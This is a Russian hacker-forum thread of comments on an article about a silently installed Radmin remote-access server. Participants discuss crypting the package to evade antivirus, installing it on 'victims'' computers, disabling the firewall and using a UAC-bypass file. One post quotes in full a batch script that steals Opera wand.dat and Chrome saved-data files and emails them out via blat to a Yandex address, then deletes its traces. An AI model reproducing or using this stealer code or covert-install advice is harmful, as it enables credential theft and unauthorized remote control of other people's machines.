1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Наши статьи", создана пользователем Iindigo, 16 дек 2010.

  1. Dima1980
    Dima1980 Новичок
    Симпатии:
    0
    Всё работает )))) что то значит инет у меня затупил!!!!
     
    13 дек 2011
  2. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    7
    Оффтоп. Ув. форумчане, вы считаете, что радмин еще актуален? Не пора перейти на что-нибудь получше?
     
    14 дек 2011
  3. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    В случае, когда у удаленной машины прямой ип - вполне рабочий способ. Аналогом можно использовать VNC, но там ниже производительность.
     
    14 дек 2011
  4. Kriptor
    Kriptor Новичок
    Симпатии:
    1
    сегодня зашёл на hakersoft в поисках програм и увидел прогу в которой некий TEMAFRG предлагает для скачивания прогу под названием BLom для кражи пасов я решил скачать для интереса посмотрел оказалось exe файл был создан через win rar sfx после извлечения обнаружил 4 файла:
    blat.dll она же библиотека почтового клиента blat
    blat.exe сам почтовый клиент
    blat.lib хрень от blata
    и файл запуска под названием test.exe открыл его через Peexplorer b увидел файл с таким содержанием:при запуске выяснилось прога рабочая я сразу изменил пасс от мыла и забрал у хакера весь куш :D 12 wand .Сразу было ясно что прога наё...
    вот слова автора на форуме:
    ****************************
    Вот,я вам вылаживаю программу,которая крадет пароли у браузера Opera.
    Принцип - саму программу кидаете на флешку,идете к другу,отправляете жарить попкорн,вставляете флешку,запускаете программу.
    Все,пароли у вас...
    Приидя домои,расшифровываем эти пароли с помощью другои программы (в архиве).
    Далее,думаю,разберетесь...
    ...
    Программа работает только на Windows7 и на Vista.
    назвал я эту програмку - OperaLOM
    Вот качаем...
    Пользуитесь на здоровье... :D
    ...
    Оцениваем,комментируем...
    Могу различные дополнения к неи сделать (кто хочет),но это уже будет стоить денег...
    **************************************************
    @echo off

    echo Please, wait 1 minute.
    "blat.exe" -body "TEST" -attach "%appdata%\Opera\Opera\profile\wand.dat" -attach "C:\Users\%username%\AppData\Local\Chromium\User Data\Default\Web Data" -attach "C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Default\Web Data" -to "wmstroyed@yandex.ru" -server "smtp.yandex.ru" -f "мля@yandex.ru" -u "мля" -pw "здесь пароль типо того хакера :D" >nul

    md "Opera"
    del "1.ini" >nul

    echo .System.file.log.ini. >>1.ini
    echo . >>1.ini
    echo Новая версия программы BloM >>1.ini
    echo . >>1.ini
    echo В эту программу входит кража паролей из... >>1.ini
    echo 1.Opera >>1.ini
    echo . >>1.ini
    echo Распространяется программа как... >>1.ini
    echo Бесплатная !FreeWare! >>1.ini
    echo . >>1.ini
    echo Ход работы программы... >>1.ini
    echo Дата %DATE% ,жертва %username% . >>1.ini
    echo Начало программы %time% >>1.ini

    attrib %APPDATA%\Opera\Opera\profile\wand.dat -h -s -a -r

    copy C:\users\%username%\AppData\Roaming\Opera\Opera\profile\wand.dat Opera\log.dat

    copy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\wand.dat" "Opera\log.dat"

    copy "%appdata%\Opera\Opera\Profile\wand.dat" "Opera\log.dat"

    if exist Opera\log.dat echo Фаил наиден! Уже скопирован в папку Opera >>1.ini
    If not exist Opera\log.dat echo Фаил не наиден!!! Вероятно, %username% не сохраняет пароли в браузере,или у него просто нет браузера Opera. >>1.ini

    echo Время завершения программы %time% >>1.ini
    echo . >>1.ini
    echo Мини реклама... >>1.ini
    echo Приобретаите дополнения к программе,в которых присутствует кража паролеи из... >>1.ini
    echo 1.MozillaFirefox. >>1.ini
    echo 2.GoogleChrome >>1.ini
    echo 3.ShWareIron >>1.ini
    echo Так же,разрабатывается кража паролеи из FTP клиента FileZilla. >>1.ini
    echo За последними обновлениями,пишите на почту temafrg@yandex.ru >>1.ini
    echo Также,вы можете предлагать свои варианты дополнении к программе BLOM. >>1.ini
    echo С вами был TEMAFRG, удачи!.. >>1.ini
    del blat.exe
    del blat.lib
    del blat.dll
    ********************************************************
    почитал код сразу всё понятно крадёт файл wand из оперы и историю от хрома(нах.. нужна хз)
    думаю идея норм можно придумать и доработать может быть получится что то более интересное
     
    25 дек 2011
  5. Rustavrus
    Rustavrus Новичок
    Симпатии:
    0
    файл poc.exe антивирусник не пускает. из за этого ошибка распаковки. как это решить?
     
    7 янв 2012
  6. TDI
    TDI Новичок
    Симпатии:
    38
    не додавать файл в сборку
    взять другой
     
    7 янв 2012
  7. Foom
    Foom Banned
    Симпатии:
    0
    Все сделал как написано, закриптовал приватным - антивирусом не палится.
    Приходи IP но не Local не Real не подключается. В чем может быть проблема ?
     
    11 янв 2012
  8. TDI
    TDI Новичок
    Симпатии:
    38
    За натом
    Файрвол...
     
    11 янв 2012
  9. Foom
    Foom Banned
    Симпатии:
    0
    Я уже на 3 человек проверил, и всегда одно и тоже
    И какой адрес в радмин вставлять нужно ? Real нужно же
    Так как локальный если по локалке соединены

    +И если файл poc.exe не установился на компе жертвы, это зависит на подключени??
     
    12 янв 2012
  10. Di[ezel]
    Di[ezel] Новичок
    Симпатии:
    0
    ув. форумчане,подскажите кто пользовал сборку с USBмодемом.Я тестил на двух компах,установилось на ура,только после установки оба компа перестали выходить в инет,висит окно "аутентификация" и все....пока не выдернул из реестра так ниче и не заработало,че эт за трабл такой может быть,кто знает?((((((
     
    16 янв 2012
  11. lebidon
    lebidon Новичок
    Симпатии:
    1
    Здравствуйте! Покажите, пожалуйста, как должен выглядеть правильно код батника только для скрытого запуска msupdate.msi с отключением Брандмауэр Windows.
     
    4 фев 2012
  12. slayder
    slayder Новичок
    Симпатии:
    0
    а если я ип жертвы знаю, возможно ли сделать сборку чтоб ип не высылался, но при этом размер файла был по меньше?)
     
    7 фев 2012
  13. TDI
    TDI Новичок
    Симпатии:
    38
    отправку ип мона выкинуть с сборки
    вес станет на чутку меньше
     
    7 фев 2012
  14. aske
    aske Новичок
    Симпатии:
    0
    Здраствуйте! тема еще актуальна?
     
    11 фев 2012
  15. TDI
    TDI Новичок
    Симпатии:
    38
    да,
    но есть некоторые нюансы
     
    11 фев 2012
  16. aske
    aske Новичок
    Симпатии:
    0
    скажем так, получится на этот момент, на ХР закинуть? Или требуется доработка? Эту тему прочитал всю. спасибо автору!

    Добавлено через 44 минуты
    эээ кто мне троянов шурует? =))
     
    Последнее редактирование: 11 фев 2012
    11 фев 2012
  17. andersen62
    andersen62 Новичок
    Симпатии:
    7

    а можно больще конкретики?
     
    14 фев 2012
  18. Linger45
    Linger45 Новичок
    Симпатии:
    0
    Уважаемый автор не могли бы сделать radmin server нового патча а то на win 7 не льзя делать настройки когда создаешь программу под себя... а когда скачиваешь с сайта то пишет что патч сервера маленький... а ихний палеца ужас)
     
    24 фев 2012
  19. demo4ek
    demo4ek Новичок
    Симпатии:
    0
    Poc.exe нужен ?


    Извините а Poc.exe тоже можно выкинуть а то на него ругается антивир. Буду ставить на Win 7. Спасибо
     
    24 мар 2012
  20. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Можешь выкинуть Poc.exe (его криптовать нужно) он только на обход uac действует (из разряда лень статью перечитать))
     
    24 мар 2012

Поделиться этой страницей

Загрузка...